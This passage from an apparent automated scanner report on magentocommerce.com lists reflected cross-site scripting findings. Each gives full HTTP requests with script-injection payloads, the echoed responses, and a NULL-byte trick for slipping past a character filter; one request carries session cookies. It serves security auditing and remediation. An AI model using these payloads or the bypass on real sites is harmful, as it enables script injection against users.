Set-Cookie: exp_last_activity=1313176311; expires=Sat, 11-Aug-2012 15:11:51 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:51 GMT
Content-Length: 33490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view">
...[SNIP]...
1.42. http://www.magentocommerce.com/media/screencasts/upsells/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073488"><script>alert(1)</script>a85e9f53621 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73488"><script>alert(1)</script>a85e9f53621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176275; expires=Sat, 11-Aug-2012 15:11:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:15 GMT
Content-Length: 33220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1">
...[SNIP]...
1.43. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2691"><script>alert(1)</script>76ef6f1716c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view">
...[SNIP]...
1.44. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074a5c"><script>alert(1)</script>763ed951bbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74a5c"><script>alert(1)</script>763ed951bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176176; expires=Sat, 11-Aug-2012 15:09:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:36 GMT
Content-Length: 40888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1">
...[SNIP]...
1.45. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43075"><script>alert(1)</script>5dc7f68ca25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:55 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/" />
...[SNIP]...
1.46. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a1db"><script>alert(1)</script>dbe4e525590 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:56 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/" />
...[SNIP]...
1.47. http://www.magentocommerce.com/products/checkout/cart/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b941"><script>alert(1)</script>9ebe58ff066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:01 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Content-Length: 23073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1" />
...[SNIP]...
1.48. http://www.magentocommerce.com/products/customer/account/create/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/create/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74218"><script>alert(1)</script>f69b9c107fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:38 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/" />
...[SNIP]...
1.49. http://www.magentocommerce.com/products/customer/account/forgotpassword/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/forgotpassword/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75651"><script>alert(1)</script>5f880c0eeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:34 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/" />
...[SNIP]...
1.50. http://www.magentocommerce.com/products/customer/account/loginPost/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/loginPost/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c50"><script>alert(1)</script>6a963e07cd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:45 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/" />
...[SNIP]...
1.51. http://www.magentocommerce.com/products/ee/sso/logout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/ee/sso/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4277a"><script>alert(1)</script>af34fe383a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout" />
...[SNIP]...
1.52. http://www.magentocommerce.com/products/job-post.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02fa"><script>alert(1)</script>f908b06c15f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:04 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f" />
...[SNIP]...
1.53. http://www.magentocommerce.com/products/job-post.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18915"><script>alert(1)</script>8cadda0bb16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:23 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Content-Length: 31497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
